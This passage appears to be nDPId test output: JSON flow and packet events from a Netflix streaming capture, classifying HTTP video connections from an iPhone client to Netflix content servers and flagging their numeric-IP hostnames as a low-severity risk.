{"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7nPaH08TBX1BaAS\/\/\/55gAAAgQFtAEDAwkEAggKNK+mZh9lEJA="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0QtJAAEAGEsDAqAEHF\/YLjc+7AFDfu3VW4GtWFIAQEBXe3gAAAQEICh9lEL6zW2N6"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1275,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1484319056313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056313,"pkt":"gCqoTGHM5JjWH70UCABFAAA0DEJAAEAGSVDAqAEHF\/YLjc+8AFAt4\/K4FWJh54AQEBVvgQAAAQEICh9lENgQPWmI"} -01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1277,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056241,"flow_last_seen":1484319056314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056314,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJ5yTLBCkGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_3mCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=r5jtnnEcR8hDCkPImfEiWqWAjKk&random=1846234524","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz72N4Tx+gHq67aAS\/\/8YZwAAAgQFtAEDAwkEAggKc9HQqh9lEJ4="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1280,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1484319056326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056326,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz749DprObTkJu6AS\/\/9Z3AAAAgQFtAEDAwkEAggKxO\/1DB9lEJ4="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0BrtAAEAGTtfAqAEHF\/YLjc+9AFCAerrtjeE8f4AQEBU20gAAAQEICh9lEOxz0dCq"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1484319056327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056327,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Fj1AAEAGP1XAqAEHF\/YLjc++AFBtOQm7PQ6az4AQEBV4RwAAAQEICh9lEOzE7\/UM"} -01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1285,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056336,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQLJ2TIBepGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPbiCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=tTXu3c6FnJtfi6z0IJp3hw8eDv8&random=129454076","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1286,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056264,"flow_last_seen":1484319056347,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056347,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJZ2VKhqgGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzTho_flHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=LQ7LyXSnZaXKEHAHaRRHk-S7dKE&random=4209810633","code":0,"content_type":"","user_agent":"netflix-ios-app"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064590,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064590,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1484319064590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064590,"pkt":"gCqoTGHM5JjWH70UCABFAABAVptAAEAGBuzAqAEHF\/YDjM+\/AFBrAzOSAAAAALAC\/\/+cMAAAAgQFtAEDAwUBAQgKH2UvkQAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319064593,"flow_last_seen":1484319064593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319064593,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1484319064593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319064593,"pkt":"gCqoTGHM5JjWH70UCABFAABAVrtAAEAG\/srAqAEHF\/YLjc\/AAFDz13keAAAAALAC\/\/\/FywAAAgQFtAEDAwUBAQgKH2UvkwAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz8BQi7Oi89d5H6AS\/\/+uwwAAAgQFtAEDAwkEAggKYvDA2R9lL5M="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1484319064620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319064620,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADgGZWsX9gOMwKgBBwBQz78\/hnHMawMzk6AS\/\/+duQAAAgQFtAEDAwkEAggKbx\/u9B9lL5E="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0SOFAAEAGDLHAqAEHF\/YLjc\/AAFDz13kfUIuzo4AQEBXNXwAAAQEICh9lL7Bi8MDZ"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1484319064621,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319064621,"pkt":"gCqoTGHM5JjWH70UCABFAAA0y1dAAEAGkjvAqAEHF\/YDjM+\/AFBrAzOTP4ZxzYAQEBW8UwAAAQEICh9lL7BvH+70"} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1916,"source":"netflix.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064593,"flow_last_seen":1484319064624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":509,"flow_tot_l4_payload_len":509,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1484319064624,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53184,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} -01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1917,"source":"netflix.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319064590,"flow_last_seen":1484319064634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":505,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1484319064634,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53183,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": 